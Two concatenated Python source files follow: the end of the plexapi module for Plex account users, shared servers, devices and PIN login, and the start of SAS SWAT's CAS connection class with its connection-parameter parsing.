elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address ([email protected]).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
protected (bool): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
title (str): Seems to be an alias for username.
username (str): User's username.
servers: Servers shared between user and friend
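Example (a hedged sketch; the email is a placeholder):
>>> friend = account.user('friend@example.com')
>>> friend.servers  # servers shared with this friend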
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}
Attributes:
TAG (str): 'Section'
id (int): shared section id
sectionKey (str): what key we use for this section
title (str): Title of the section
sectionId (str): shared section id
type (str): movie, tvshow, artist
shared (bool): If this section is shared with the user
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
# self.id = utils.cast(int, data.attrib.get('id'))  # Haven't decided if this should be changed.
self.sectionKey = data.attrib.get('key')
self.title = data.attrib.get('title')
self.sectionId = data.attrib.get('id')
self.type = data.attrib.get('type')
self.shared = utils.cast(bool, data.attrib.get('shared'))
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (str): The id Plex uses for this server.
machineIdentifier (str): The server's machineIdentifier.
name (str): The server's name.
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries.
allLibraries (bool): True if all libraries are shared with this user.
owned (bool): True if the server is owned by the user.
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
sections = []
for section in data.iter('Section'):
if ElementTree.iselement(section):
sections.append(Section(self, section, url))
return sections
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resource's access token.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
# This seems to only be available if it's not your own device (e.g. a shared server).
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
self.sourceTitle = data.attrib.get('sourceTitle')  # owner's Plex username.
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~server.PlexServer` or :class:`~client.PlexClient` object.
Oftentimes there is more than one address specified for a server or client.
This function will prioritize local connections before remote and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
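Example (a hedged sketch; the resource name is a placeholder):
>>> plex = account.resource('<SERVER NAME>').connect(ssl=True)  # only try HTTPS connections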
"""
# Sort connections from (https, local) to (http, remote)
# Only check non-local connections unless we own the resource
connections = sorted(self.connections, key=lambda c: c.local, reverse=True)
owned_or_unowned_non_local = lambda x: self.owned or (not self.owned and not x.local)
https = [c.uri for c in connections if owned_or_unowned_non_local(c)]
http = [c.httpuri for c in connections if owned_or_unowned_non_local(c)]
cls = PlexServer if 'server' in self.provides else PlexClient
# Force ssl, no ssl, or any (default)
if ssl is True: connections = https
elif ssl is False: connections = http
else: connections = https + http
# Try connecting to all known resource connections in parallel, but
# only return the first server (in order) that provides a response.
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.info('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
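Example (a hedged sketch; the device name is a placeholder):
>>> device = account.device('<DEVICE NAME>')
>>> client = device.connect()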
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = [connection.attrib.get('uri') for connection in data.iter('Connection')]
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:class:`plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.info('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`plexapi.sync.SyncList` for current device.
Raises:
:class:`plexapi.exceptions.BadRequest`: when the device doesn't provide `sync-target`.
"""
if 'sync-target' not in self.provides:
raise BadRequest("Requested syncList for a device which doesn't provide sync-target")
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/pins.xml'
CHECKPINS (str): 'https://plex.tv/pins/{pinid}.xml'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
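Example of the polling approach (a hedged sketch; the sleep interval is arbitrary):
>>> import time
>>> from plexapi.myplex import MyPlexAccount, MyPlexPinLogin
>>> pinlogin = MyPlexPinLogin()
>>> print(pinlogin.pin)  # show this PIN to the user for entry at https://plex.tv/link
>>> while not pinlogin.finished:
...     pinlogin.checkLogin()
...     time.sleep(2)
>>> if pinlogin.token:
...     account = MyPlexAccount(token=pinlogin.token)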
"""
PINS = 'https://plex.tv/pins.xml' # get
CHECKPINS = 'https://plex.tv/pins/{pinid}.xml' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self.finished = False
self.expired = False
self.token = None
self.pin = None  # must exist before _getPin(), which reads self.pin
self.pin = self._getPin()
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
:class:`RuntimeError`: if the thread is already running.
:class:`RuntimeError`: if the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getPin(self):
if self.pin:
return self.pin
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.find('id').text
self.pin = response.find('code').text
return self.pin
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.find('auth_token').text
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _query(self, url, method=None):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = BASE_HEADERS.copy()
response = method(url, headers=headers, timeout=self._requestTimeout)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
token (str): authentication token which should be passed as `token` argument to cls.__init__()
timeout (int): timeout which should be passed as `timeout` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
job_is_done_event (:class:`~threading.Event`): if X_PLEX_ENABLE_FAST_CONNECT is True then the
event will be set as soon as the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.info('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.info('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
|
connection.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''
Class for creating CAS sessions
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import collections
import contextlib
import copy
import inspect
import itertools
import json
import os
import random
import re
import six
import warnings
import weakref
from six.moves.urllib.parse import urlparse
from . import rest
from .. import clib
from .. import config as cf
from ..exceptions import SWATError, SWATCASActionError, SWATCASActionRetry
from ..logging import logger
from ..utils.config import subscribe, get_option
from ..clib import errorcheck
from ..utils.compat import (a2u, a2n, int32, int64, float64, text_types,
binary_types, items_types, int_types, dict_types)
from ..utils import getsoptions
from ..utils.args import iteroptions
from ..formatter import SASFormatter
from .actions import CASAction, CASActionSet
from .table import CASTable
from .transformers import py2cas
from .request import CASRequest
from .response import CASResponse
from .results import CASResults
from .utils.params import ParamManager, ActionParamManager
from .utils.misc import super_dir, any_file_exists
# pylint: disable=W0212
RETRY_ACTION_CODE = 0x280034
SESSION_ABORTED_CODE = 0x2D51AC
def _option_handler(key, value):
''' Handle option changes '''
sessions = list(CAS.sessions.values())
key = key.lower()
if key == 'cas.print_messages':
key = 'print_messages'
elif key == 'cas.trace_actions':
key = 'trace_actions'
elif key == 'cas.trace_ui_actions':
key = 'trace_ui_actions'
else:
return
for ses in sessions:
ses._set_option(**{key: value})
subscribe(_option_handler)
def _lower_actionset_keys(asinfo):
'''
Lowercase action set information keys
Parameters
----------
asinfo : dict
Action set reflection information
Returns
-------
dict
Same dictionary with lower-cased action / param keys
'''
for act in asinfo.get('actions', []):
act['name'] = act['name'].lower()
for param in act.get('params', []):
param['name'] = param['name'].lower()
if 'parmList' in param:
param['parmList'] = _lower_parmlist_keys(param['parmList'])
if 'exemplar' in param:
param['exemplar'] = _lower_parmlist_keys(param['exemplar'])
return asinfo
def _lower_parmlist_keys(parmlist):
'''
Lowercase parmList/exemplar keys
Parameters
----------
parmlist : list
parmList or exemplar reflection information
Returns
-------
list
Same list with lower-cased name keys
'''
for parm in parmlist:
parm['name'] = parm['name'].lower()
if 'parmList' in parm:
parm['parmList'] = _lower_parmlist_keys(parm['parmList'])
if 'exemplar' in parm:
parm['exemplar'] = _lower_parmlist_keys(parm['exemplar'])
return parmlist
@six.python_2_unicode_compatible
class CAS(object):
'''
Create a connection to a CAS server.
Parameters
----------
hostname : string or list-of-strings, optional
Host or URL to connect to. This parameter can also be specified
by a ``CAS_URL`` or ``CAS_HOST`` environment variable.
port : int or long, optional
Port number. If not specified, the value will come from the
``cas.port`` option or ``CAS_PORT`` environment variable.
If a URL is specified in the first parameter, that port number
will be used.
username : string, optional
Name of user on CAS host. This parameter can also be specified
in a ``CAS_USER`` environment variable.
password : string, optional
Password of user on CAS host or OAuth token. If an OAuth token
is specified, the `username` parameter should be None.
This parameter can also be specified in a ``CAS_PASSWORD``
or ``CAS_TOKEN`` environment variable.
session : string, optional
ID of existing session to reconnect to.
locale : string, optional
Name of locale used for the session.
name : string, optional
User-definable name for the session.
nworkers : int or long, optional
Number of worker nodes to use.
authinfo : string or list-of-strings, optional
The filename or list of filenames of authinfo/netrc files used
for authentication.
protocol : string, optional
The protocol to use for communicating with the server.
This protocol must match the protocol spoken by the specified
server port. If the first parameter is a URL, that protocol will
be used.
path : string, optional
Base path of URL when using the REST protocol.
ssl_ca_list : string, optional
The path to the SSL certificates for the CAS server.
**kwargs : any, optional
Arbitrary keyword arguments used for internal purposes only.
Raises
------
IOError
When a connection can not be established.
Returns
-------
:class:`CAS` object
Examples
--------
To create a connection to a CAS host, you simply supply a hostname
(or list of hostnames), a port number, and user credentials. Here is
an example specifying a single hostname, and username and password as
strings.
>>> conn = swat.CAS('mycashost.com', 5570, 'username', 'password')
If you use an authinfo file and it is in your home directory, you don't
have to specify any username or password. You can override the authinfo
file location with the authinfo= parameter. This form also works for
Kerberos authentication.
>>> conn = swat.CAS('mycashost.com', 5570)
If you specify multiple hostnames, it will connect to the first available
server in the list.
>>> conn = swat.CAS(['mycashost1.com', 'mycashost2.com', 'mycashost3.com'],
5570, 'username', 'password')
URLs can also be used for both binary and REST protocols. Notice that
you need to specify the username= and password= keywords since the
port number is skipped.
>>> conn = swat.CAS('cas://mycashost1.com:5570',
... username='username', password='password')
>>> conn = swat.CAS('http://mycashost1.com:80',
... username='username', password='password')
To connect to an existing CAS session, you specify the session identifier.
>>> conn = swat.CAS('mycashost.com', 5570,
... session='ABCDEF12-ABCD-EFG1-2345-ABCDEF123456')
If you wish to change the locale used on the server, you can use the
locale= option.
>>> conn = swat.CAS('mycashost.com', 5570, locale='es_US')
To limit the number of worker nodes in a grid, you use the nworkers=
parameter.
>>> conn = swat.CAS('mycashost.com', 5570, nworkers=4)
'''
trait_names = None # Block IPython's query for this
sessions = weakref.WeakValueDictionary()
_sessioncount = 1
@classmethod
def _expand_url(cls, url):
''' Expand [...] groups in URL to all linear combinations '''
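# A hedged illustration of the expansion performed below:
#   'cas://host[a,b].example.com:5570' -> ['cas://hosta.example.com:5570',
#                                          'cas://hostb.example.com:5570']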
if not isinstance(url, items_types):
url = [url]
out = []
for item in url:
parts = [x for x in re.split(r'(?:\[|\])', item) if x]
for i, part in enumerate(parts):
if ',' in part:
parts[i] = re.split(r'\s*,\s*', part)
# elif re.match(r'^\d+\-\d+$', part):
# start, end = part.split('-')
# width = len(start)
# start = int(start)
# end = int(end)
# parts[i] = [('%%0%sd' % width) % x for x in range(start, end+1)]
else:
parts[i] = [part]
out += list(''.join(x) for x in itertools.product(*parts))
return out
@classmethod
def _get_connection_info(cls, hostname, port, username, password, protocol, path):
''' Distill connection information from parameters, config, and environment '''
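# A hedged illustration (ignoring config/environment defaults):
#   hostname='http://cas.example.com:8777/cas-shared-default', port=None, protocol=None
#   -> ('http://cas.example.com:8777/cas-shared-default', 8777, username, password, 'http')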
# Get defaults from config, if needed
username = username or cf.get_option('cas.username')
password = password or cf.get_option('cas.token')
protocol = protocol or cf.get_option('cas.protocol')
hostname = hostname or cf.get_option('cas.hostname')
port = port or cf.get_option('cas.port')
logger.debug('Connection info: hostname=%s port=%s protocol=%s '
'username=%s password=%s path=%s',
hostname, port, protocol, username, password, path)
# Always make hostname a list
if not isinstance(hostname, items_types):
hostname = re.split(r'\s+', re.sub(r'\s*,\s*', r',', hostname.strip()))
else:
hostname = [re.sub(r'\s*,\s*', r',', x.strip()) for x in hostname]
# Check hostname for other components
new_hostname = []
for name in hostname:
if not re.match(r'^\w+://', name):
new_hostname.append('%s://%s' % (protocol, name))
else:
new_hostname.append(name)
hostname = cls._expand_url(new_hostname)
urlp = urlparse(hostname[0])
protocol = urlp.scheme or protocol
hostname = [urlparse(x).hostname for x in hostname]
port = urlp.port or port
username = urlp.username or username
password = urlp.password or password
path = urlp.path or path
# Set port based on protocol, if port number is missing
if not port:
if protocol == 'http':
port = 80
elif protocol == 'https':
port = 443
elif protocol == 'cas':
port = 5570
else:
raise SWATError('Port number was not specified')
# Auto-detect protocol if still missing
if protocol == 'auto':
protocol = cls._detect_protocol(hostname, port, protocol=protocol)
if protocol not in ['http', 'https', 'cas']:
raise SWATError('Unrecognized protocol: %s' % protocol)
# For http(s), construct URLs
if protocol.startswith('http'):
urls = []
for name in hostname:
url = '%s://%s:%s' % (protocol, name, port)
if path:
url = '%s/%s' % (url, re.sub(r'^/+', r'', path))
urls.append(url)
hostname = ' '.join(urls)
logger.debug('Distilled connection parameters: '
"url='%s' username=%s", urls, username)
else:
hostname = ' '.join(hostname)
logger.debug('Distilled connection parameters: '
"hostname='%s' port=%s, username=%s, protocol=%s",
hostname, port, username, protocol)
return a2n(hostname), int(port), a2n(username), a2n(password), a2n(protocol)
def __init__(self, hostname=None, port=None, username=None, password=None,
session=None, locale=None, nworkers=None, name=None,
authinfo=None, protocol=None, path=None, ssl_ca_list=None,
**kwargs):
# Filter session options allowed as parameters
_kwargs = {}
sess_opts = {}
for k, v in kwargs.items():
if k.lower() in ['caslib', 'metrics', 'timeout', 'timezone']:
sess_opts[k] = v
else:
_kwargs[k] = v
kwargs = _kwargs
# Check for unknown connection parameters
unknown_keys = [k for k in kwargs if k not in ['prototype']]
if unknown_keys:
warnings.warn('Unrecognized keys in connection parameters: %s' %
', '.join(unknown_keys))
# If a prototype exists, use it for the connection config
prototype = kwargs.get('prototype')
if prototype is not None:
soptions = a2n(prototype._soptions)
protocol = a2n(prototype._protocol)
else:
# Distill connection information from parameters, config, and environment
hostname, port, username, password, protocol = \
self._get_connection_info(hostname, port, username,
password, protocol, path)
soptions = a2n(getsoptions(session=session, locale=locale,
nworkers=nworkers, protocol=protocol))
# Check for SSL certificate
if ssl_ca_list is None:
ssl_ca_list = cf.get_option('cas.ssl_ca_list')
if ssl_ca_list:
logger.debug('Using certificate file: %s', ssl_ca_list)
os.environ['CAS_CLIENT_SSL_CA_LIST'] = ssl_ca_list
# Check for explicitly specified authinfo files
if authinfo is not None:
if not any_file_exists(authinfo):
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
raise OSError('None of the specified authinfo files '
'exist: %s' % ', '.join(authinfo))
# Create error handler
try:
if protocol in ['http', 'https']:
self._sw_error = rest.REST_CASError(soptions)
else:
self._sw_error = clib.SW_CASError(soptions)
except SystemError:
raise SWATError('Could not create CAS error handler object. '
'Check your SAS TK path setting.')
# Make the connection
try:
# Make a copy of the prototype connection
if prototype is not None:
self._sw_connection = errorcheck(prototype._sw_connection.copy(),
prototype._sw_connection)
# Create a new connection
else:
# Set up authinfo paths
if authinfo is not None and password is None:
password = ''
if not isinstance(authinfo, items_types):
authinfo = [authinfo]
for item in authinfo:
password += '{%s}' % item
password = 'authinfo={%s}' % password
# Set up connection parameters
params = (hostname, port, username, password, soptions, self._sw_error)
if protocol in ['http', 'https']:
self._sw_connection = rest.REST_CASConnection(*params)
else:
self._sw_connection = clib.SW_CASConnection(*params)
# If we don't have a connection, bail out.
if self._sw_connection is None:
raise SystemError
except SystemError:
raise SWATError(self._sw_error.getLastErrorMessage())
# Set up index origin for error messages
errorcheck(self._sw_connection.setZeroIndexedParameters(), self._sw_connection)
# Get instance structure values from connection layer
self._hostname = errorcheck(
a2u(self._sw_connection.getHostname(), 'utf-8'), self._sw_connection)
self._port = errorcheck(self._sw_connection.getPort(), self._sw_connection)
self._username = errorcheck(
a2u(self._sw_connection.getUsername(), 'utf-8'), self._sw_connection)
self._session = errorcheck(
a2u(self._sw_connection.getSession(), 'utf-8'), self._sw_connection)
self._soptions = errorcheck(
